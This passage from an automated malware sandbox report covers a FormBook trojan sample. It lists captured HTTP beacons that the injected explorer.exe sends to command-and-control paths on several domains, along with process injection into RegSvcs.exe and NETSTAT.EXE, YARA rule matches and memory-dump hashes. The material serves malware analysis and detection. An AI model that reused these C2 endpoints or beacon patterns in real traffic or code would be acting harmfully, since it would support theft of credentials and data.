                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Nov 29, 2022 18:25:56.725609064 CET | 152 | IN | HTTP/1.1 404 Not Found
                                        Date: Tue, 29 Nov 2022 17:25:56 GMT
                                        Server: Apache
                                        Content-Length: 1080
                                        Connection: close
                                        Content-Type: text/html; charset=utf-8
                                        Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Kanit:200" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/font-awesome.min.css" /><link type="text/css" rel="stylesheet" href="/css/style.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>404</h1></div><h2>Oops! Nothing was found</h2><p>The page you are looking for might have been removed had its name changed or is temporarily unavailable. <a href="#">Return to homepage</a></p><div class="notfound-social"><a href="#"><i class="fa fa-facebook"></i></a><a href="#"><i class="fa fa-twitter"></i></a><a href="#"><i class="fa fa-pinterest"></i></a><a href="#"><i class="fa fa-google-plus"></i></a></div></div></div></body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                        13 | 192.168.2.6 | 49727 | 172.67.148.132 | 80 | C:\Windows\explorer.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        Nov 29, 2022 18:26:01.797384977 CET | 153 | OUT | POST /4u5a/ HTTP/1.1
                                        Host: www.canadianlocalbusiness.com
                                        Connection: close
                                        Content-Length: 190
                                        Cache-Control: no-cache
                                        Origin: http://www.canadianlocalbusiness.com
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://www.canadianlocalbusiness.com/4u5a/
                                        Accept-Language: en-US
                                        Accept-Encoding: gzip, deflate
                                        Data Ascii: l0GX=lCbw7QlVMFZggCOsYLKkJQGXvXFIIEp85Tej96u-5kzrXbz9CuykEJpwa4Y5rksN~H8jOBbXbXMDtgEzX03AjnYRb0UvTK6Z71YQlEXniQIEtdQ_suGP9FoKB4SNaVJMqnatyvpdsOv3nizQd34vhmE5grdl6-8Z~OsjcPFd(roXFC41URIjE1s.
                                        Nov 29, 2022 18:26:02.036621094 CET | 154 | IN | HTTP/1.1 404 Not Found
                                        Date: Tue, 29 Nov 2022 17:26:02 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Vary: Accept-Encoding
                                        CF-Cache-Status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=b4Bm5oT6L32EHhQScn%2FtDbeMq%2BGSCtJ4rHUlR%2F9gG1wt8%2FwTsgoIiTesoXJRrMBYYUrbydAF9DG4SBVpxme%2F4Q6xkkqvRLysGUpAO2uDyfGHGC9THh5E8MONAvbn6lHBEf9ryiEAkI5ZF4vZzenvFw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 771d0bc54f76cb33-DUS
                                        Content-Encoding: gzip
                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                        Nov 29, 2022 18:26:02.036678076 CET | 154 | IN | Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                        14 | 192.168.2.6 | 49728 | 172.67.148.132 | 80 | C:\Windows\explorer.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        Nov 29, 2022 18:26:03.840754986 CET | 157 | OUT | POST /4u5a/ HTTP/1.1
                                        Host: www.canadianlocalbusiness.com
                                        Connection: close
                                        Content-Length: 1454
                                        Cache-Control: no-cache
                                        Origin: http://www.canadianlocalbusiness.com
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://www.canadianlocalbusiness.com/4u5a/
                                        Accept-Language: en-US
                                        Accept-Encoding: gzip, deflate
                                        Nov 29, 2022 18:26:04.094774008 CET | 158 | IN | HTTP/1.1 404 Not Found
                                        Date: Tue, 29 Nov 2022 17:26:04 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Vary: Accept-Encoding
                                        CF-Cache-Status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Jaa7kcfd7bhqdLX%2BdsVwejqS0LNj%2B78qOvyX9vxAKUqLl0zphihGHPKzcKLvxmdQpMSPuS62wkF%2B2VPDre1rQCML7ysqKeZLpQKERY5%2Fpc0doM%2BigaFk2AS6tyy2cLB5INHeF6%2FnLbEv1IZyRvjzOg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 771d0bd20dfdcb0d-DUS
                                        Content-Encoding: gzip
                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                        Nov 29, 2022 18:26:04.094841957 CET | 158 | IN | Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                        15 | 192.168.2.6 | 49729 | 172.67.148.132 | 80 | C:\Windows\explorer.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        Nov 29, 2022 18:26:05.883320093 CET | 158 | OUT | GET /4u5a/?l0GX=oAzQ4htCGi4nqSyuBtGVfUCtoVNBPGpnnjqt2pSGyg/seKLGD+qTa4VfLqEZsFdX3QB0KgbSd28tsjFwPlPYkk5JGWRtP+2k/VY6r0frt1hO&GFQD=d2J0s HTTP/1.1
                                        Host: www.canadianlocalbusiness.com
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Nov 29, 2022 18:26:06.166044950 CET | 159 | IN | HTTP/1.1 404 Not Found
                                        Date: Tue, 29 Nov 2022 17:26:06 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Vary: Accept-Encoding
                                        CF-Cache-Status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Clw8fY7BTlk%2BiuvgOg38eNqUX%2BGkg%2FfQmp23yaEcJNSKPLcsQppB4ilga4hDWbNYtsCNEfZxXpq%2BFcatW2a3IHfDbDeR20jL6T6YaLWHd83aJ2ntsmrCUXAOGPyWH8DcwEGCG9SmWqqhZrRcNN9ynw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 771d0bdedcba9b83-FRA
                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                        Data Ascii: a2<html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                        Nov 29, 2022 18:26:06.166151047 CET | 159 | IN | Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                        2           192.168.2.6  49716        89.31.143.1     80                C:\Windows\explorer.exe
                                        Timestamp  kBytes transferred  Direction  Data
                                        Nov 29, 2022 18:25:14.601547003 CET  123  OUT  POST /4u5a/ HTTP/1.1
                                        Host: www.dersameh.com
                                        Connection: close
                                        Content-Length: 1454
                                        Cache-Control: no-cache
                                        Origin: http://www.dersameh.com
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://www.dersameh.com/4u5a/
                                        Accept-Language: en-US
                                        Accept-Encoding: gzip, deflate
                                        Nov 29, 2022 18:25:14.623873949 CET  123  IN  HTTP/1.1 405 Not Allowed
                                        Date: Tue, 29 Nov 2022 17:25:14 GMT
                                        Content-Type: text/html
                                        Content-Length: 150
                                        Connection: close
                                        Server: UD Forwarding 3.1
                                        Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                        3           192.168.2.6  49717        89.31.143.1     80                C:\Windows\explorer.exe
                                        Timestamp  kBytes transferred  Direction  Data
                                        Nov 29, 2022 18:25:16.654036999 CET  124  OUT  GET /4u5a/?l0GX=DO8SLO7p+ieBn2EC0oYIAc7qa4Xo4oKKhL6K9ytUp3CH+6ohEz4QzFDvrvyjA4KB81/r5tutyqTX+rvP+Yb6ZUWqEETpfEhrV3qJRCQNMeQd&GFQD=d2J0s HTTP/1.1
                                        Host: www.dersameh.com
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Nov 29, 2022 18:25:16.677865982 CET  124  IN  HTTP/1.1 200 OK
                                        Date: Tue, 29 Nov 2022 17:25:16 GMT
                                        Content-Type: text/html
                                        Content-Length: 6637
                                        Last-Modified: Thu, 21 Jan 2021 10:26:31 GMT
                                        Connection: close
                                        ETag: "600956d7-19ed"
                                        Server: UD Forwarding 3.1
                                        Accept-Ranges: bytes
                                        Nov 29, 2022 18:25:16.677930117 CET  125  IN  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 44 6f 6d 61 69 6e 20 72 65 67 69
                                        Data Ascii: <!DOCTYPE html><html lang="de"><head><meta name="description" content="Domain registriert bei united-domains.de"><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Domain im Kundenauftrag registriert</title><style>body,h
                                        Nov 29, 2022 18:25:16.678113937 CET  131  IN  Data Raw: 6c 6c 74 2e 20 53 69 65 20 77 69 72 64 20 62 65 69 20 6a 65 64 65 72 20 6e 65 75 65 6e 20 44 6f 6d 61 69 6e 20 68 69 6e 74 65 72 6c 65 67 74 20 75 6e 64 20 7a 65 69 67 74 2c 20 64 61 73 73 20 64 69 65 20 6e 65 75 65 20 44 6f 6d 61 69 6e 20 65 72
                                        Data Ascii: llt. Sie wird bei jeder neuen Domain hinterlegt und zeigt, dass die neue Domain erreichbar ist.<br>Ohne diese Platzhalter-Seite w&uuml;rden Besucher eine Fehlermeldung erhalten. Als Kunde von united-domains k&ouml;nnen Sie diese Domain in Ihre
                                        Nov 29, 2022 18:25:16.678148985 CET  131  IN  Data Raw: 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 20 6e 6f 6f 70 65 6e 65 72 22 3e 44 61 74 65 6e 73 63 68 75 74 7a 68 69 6e 77 65 69 73 65 3c 2f 61 3e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72
                                        Data Ascii: rel="nofollow noopener">Datenschutzhinweise</a></p></div></div><div class="footer-wrapper"><div class="footer">&copy; united-domains AG. <span>&nbsp;Alle Rechte vorbehalten.</span></div></div></body></html>


                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                        4           192.168.2.6  49718        54.38.220.85    80                C:\Windows\explorer.exe
                                        Timestamp  kBytes transferred  Direction  Data
                                        Nov 29, 2022 18:25:21.776768923 CET  132  OUT  POST /4u5a/ HTTP/1.1
                                        Host: www.darkchocolatebliss.com
                                        Connection: close
                                        Content-Length: 190
                                        Cache-Control: no-cache
                                        Origin: http://www.darkchocolatebliss.com
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://www.darkchocolatebliss.com/4u5a/
                                        Accept-Language: en-US
                                        Accept-Encoding: gzip, deflate


                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                        5           192.168.2.6  49719        54.38.220.85    80                C:\Windows\explorer.exe
                                        Timestamp  kBytes transferred  Direction  Data
                                        Nov 29, 2022 18:25:23.822163105 CET  134  OUT  POST /4u5a/ HTTP/1.1
                                        Host: www.darkchocolatebliss.com
                                        Connection: close
                                        Content-Length: 1454
                                        Cache-Control: no-cache
                                        Origin: http://www.darkchocolatebliss.com
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://www.darkchocolatebliss.com/4u5a/
                                        Accept-Language: en-US
                                        Accept-Encoding: gzip, deflate


                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                        6           192.168.2.6  49720        54.38.220.85    80                C:\Windows\explorer.exe
                                        Timestamp  kBytes transferred  Direction  Data
                                        Nov 29, 2022 18:25:25.865695000 CET  135  OUT  GET /4u5a/?GFQD=d2J0s&l0GX=pzMeEw2CLp9onsoEnnWxz7DjwWrmiPcXMIcMx0e8RMBYp3cHCqEf8wLsuyWBJtbijuVM0Zvb5p08kUy+wXRBHzYlQdhpzNTGfYmB4954z6O2 HTTP/1.1
                                        Host: www.darkchocolatebliss.com
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Nov 29, 2022 18:25:25.884027958 CET  135  IN  HTTP/1.1 404 Not Found
                                        Server: nginx/1.14.0 (Ubuntu)
                                        Date: Tue, 29 Nov 2022 17:25:25 GMT
                                        Content-Type: text/html
                                        Content-Length: 178
                                        Connection: close
                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                        7           192.168.2.6  49721        154.209.6.241   80                C:\Windows\explorer.exe
                                        Timestamp  kBytes transferred  Direction  Data
                                        Nov 29, 2022 18:25:31.457118988 CET  137  OUT  POST /4u5a/ HTTP/1.1
                                        Host: www.y31jaihdb6zm87.buzz
                                        Connection: close
                                        Content-Length: 190
                                        Cache-Control: no-cache
                                        Origin: http://www.y31jaihdb6zm87.buzz
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://www.y31jaihdb6zm87.buzz/4u5a/
                                        Accept-Language: en-US
                                        Accept-Encoding: gzip, deflate
                                        Nov 29, 2022 18:25:32.221436024 CET  138  OUT  POST /4u5a/ HTTP/1.1
                                        Host: www.y31jaihdb6zm87.buzz
                                        Connection: close
                                        Content-Length: 190
                                        Cache-Control: no-cache
                                        Origin: http://www.y31jaihdb6zm87.buzz
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://www.y31jaihdb6zm87.buzz/4u5a/
                                        Accept-Language: en-US
                                        Accept-Encoding: gzip, deflate
                                        Nov 29, 2022 18:25:32.606645107 CET  138  IN  HTTP/1.1 404 Not Found
                                        Server: nginx
                                        Date: Tue, 29 Nov 2022 17:11:54 GMT
                                        Content-Type: text/html
                                        Content-Length: 146
                                        Connection: close
                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                        8           192.168.2.6  49722        154.209.6.241   80                C:\Windows\explorer.exe
                                        Timestamp  kBytes transferred  Direction  Data
                                        Nov 29, 2022 18:25:42.914102077 CET  141  OUT  POST /4u5a/ HTTP/1.1
                                        Host: www.y31jaihdb6zm87.buzz
                                        Connection: close
                                        Content-Length: 1454
                                        Cache-Control: no-cache
                                        Origin: http://www.y31jaihdb6zm87.buzz
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://www.y31jaihdb6zm87.buzz/4u5a/
                                        Accept-Language: en-US
                                        Accept-Encoding: gzip, deflate
                                        Nov 29, 2022 18:25:43.308239937 CET    141    OUT
                                        Nov 29, 2022 18:25:44.097312927 CET    142    OUT
                                        Nov 29, 2022 18:25:44.491835117 CET    142    IN    HTTP/1.1 404 Not Found
                                        Server: nginx
                                        Date: Tue, 29 Nov 2022 17:12:05 GMT
                                        Content-Type: text/html
                                        Content-Length: 146
                                        Connection: close
                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                        Session ID: 9
                                        Source IP: 192.168.2.6
                                        Source Port: 49723
                                        Destination IP: 154.209.6.241
                                        Destination Port: 80
                                        Process: C:\Windows\explorer.exe
                                        Timestamp    kBytes transferred    Direction    Data
                                        Nov 29, 2022 18:25:45.330832005 CET    143    OUT    GET /4u5a/?l0GX=odL+ljtDJZnnvHXGVqz6MYcHTNNFW2XRvrcwy4k99/9PUVuyA+q7lKaiZ8dF4agdsl/xXcCsqSWGiuLBWKJZJi8UVH1n7ApvhveD6637F7nt&GFQD=d2J0s HTTP/1.1
                                        Host: www.y31jaihdb6zm87.buzz
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Nov 29, 2022 18:25:45.718872070 CET    144    IN    HTTP/1.1 404 Not Found
                                        Server: nginx
                                        Date: Tue, 29 Nov 2022 17:12:07 GMT
                                        Content-Type: text/html
                                        Content-Length: 146
                                        Connection: close
                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                        Target ID:0
                                        Start time:18:24:01
                                        Start date:29/11/2022
                                        Path:C:\Users\user\Desktop\NHYGUnNN.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Users\user\Desktop\NHYGUnNN.exe
                                        Imagebase:0x12a25d20000
                                        File size:275456 bytes
                                        MD5 hash:4F9C8432B57FA1AA875071DE547BA947
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Reputation:low

                                        Target ID:1
                                        Start time:18:24:03
                                        Start date:29/11/2022
                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\Regsvcs.exe
                                        Imagebase:0x830000
                                        File size:45152 bytes
                                        MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.318189289.0000000000DB0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:high

                                        Target ID:2
                                        Start time:18:24:05
                                        Start date:29/11/2022
                                        Path:C:\Windows\explorer.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\Explorer.EXE
                                        Imagebase:0x7ff647860000
                                        File size:3933184 bytes
                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:high

                                        Target ID:10
                                        Start time:18:24:38
                                        Start date:29/11/2022
                                        Path:C:\Windows\SysWOW64\NETSTAT.EXE
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\NETSTAT.EXE
                                        Imagebase:0x1010000
                                        File size:32768 bytes
                                        MD5 hash:4E20FF629119A809BC0E7EE2D18A7FDB
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:moderate

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.242074715.00007FFCA43F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA43F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffca43f0000_NHYGUnNN.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: b%4
                                          • API String ID: 0-4138019499
                                          • Opcode ID: 32f25da451f8eabd2dfe47d78f96126d23d8bfdcfc2121ed9ef39bc1549b2161
                                          • Instruction ID: 4d5f5d6a15e0cf3f28dfbb3106f4b03b77a5e32a2907d97d7820873cd6f6480a
                                          • Opcode Fuzzy Hash: 32f25da451f8eabd2dfe47d78f96126d23d8bfdcfc2121ed9ef39bc1549b2161
                                          • Instruction Fuzzy Hash: 2D218E74D0A61ECFEB50DFA8D0915ADBBB1FF94300F10467AE41AEB291DA39A941CF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%


                                          Memory Dump Source
                                          • Source File: 00000000.00000002.242074715.00007FFCA43F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA43F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffca43f0000_NHYGUnNN.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0f9e02098f8b630a0e5e8dd2a9db19a1021eaf940785710aa1ecac0503cc1ee1
                                          • Instruction ID: 932990501d2c120841142d63c5fd041e8db7d32b860b3d8784329ed8c8d74830
                                          • Opcode Fuzzy Hash: 0f9e02098f8b630a0e5e8dd2a9db19a1021eaf940785710aa1ecac0503cc1ee1
                                          • Instruction Fuzzy Hash: 0E216A31914A1D8FCB44EF59C4929FE77F0EB98340F00067AE809E7291CA34F851CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.242074715.00007FFCA43F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA43F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffca43f0000_NHYGUnNN.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 759e4072d0f92918a3188f46de8f40658bbe93fe3d28ede303d4381dfc4fc001
                                          • Instruction ID: 570ed9569fbb726c747b93ec6c558178d58fca5b647d5752b7bb43248a43fecc
                                          • Opcode Fuzzy Hash: 759e4072d0f92918a3188f46de8f40658bbe93fe3d28ede303d4381dfc4fc001
                                          • Instruction Fuzzy Hash: FC219CB0D1692D8FEFA4DB088894BADB7B1FF98300F1086A6C01DE7251DB746D858F55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.242074715.00007FFCA43F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA43F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffca43f0000_NHYGUnNN.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7948af9bb9ba8c70b548140c90f74d470b6de823e5ec1931cc7a54af6f8ddbe5
                                          • Instruction ID: e900cad8afaed5d794c69cbde40d1e2cc749aacbeca200c34a614198ebbe0f34
                                          • Opcode Fuzzy Hash: 7948af9bb9ba8c70b548140c90f74d470b6de823e5ec1931cc7a54af6f8ddbe5
                                          • Instruction Fuzzy Hash: 1421BF7091899D8FDF94DF58C494BACBBB1FF59300F1541A9D44EEB2A5CA31A981CF10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.242074715.00007FFCA43F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA43F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffca43f0000_NHYGUnNN.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4504fc095d839e83db736f8fdf7a4b2f1cdb379ef8cfe613c60c33b3e49f193a
                                          • Instruction ID: a9ea806f626ff69001d22a26225ca3dc23d00cc9bad10ae43cd005c0c5518823
                                          • Opcode Fuzzy Hash: 4504fc095d839e83db736f8fdf7a4b2f1cdb379ef8cfe613c60c33b3e49f193a
                                          • Instruction Fuzzy Hash: 3E11823044E7C98FD746DF2488610D93FB0EF4B205B0905EBE888CB1A3C629A91AC791
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.242074715.00007FFCA43F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA43F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffca43f0000_NHYGUnNN.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 97711d43959c5826771338493f20b47c3264c2851a6ad664d8e236b5e4bdd55c
                                          • Instruction ID: 5fc52294b3560e6129617dea1048e31426c1f1828a1be5a8559fb85f29cf1bfa
                                          • Opcode Fuzzy Hash: 97711d43959c5826771338493f20b47c3264c2851a6ad664d8e236b5e4bdd55c
                                          • Instruction Fuzzy Hash: 9C11D630A1492D8FDF98EB5CC855BEDB7B2FBA8301F1041A9914DE3265CB35A981CF41
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.242074715.00007FFCA43F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA43F0000, based on PE: false
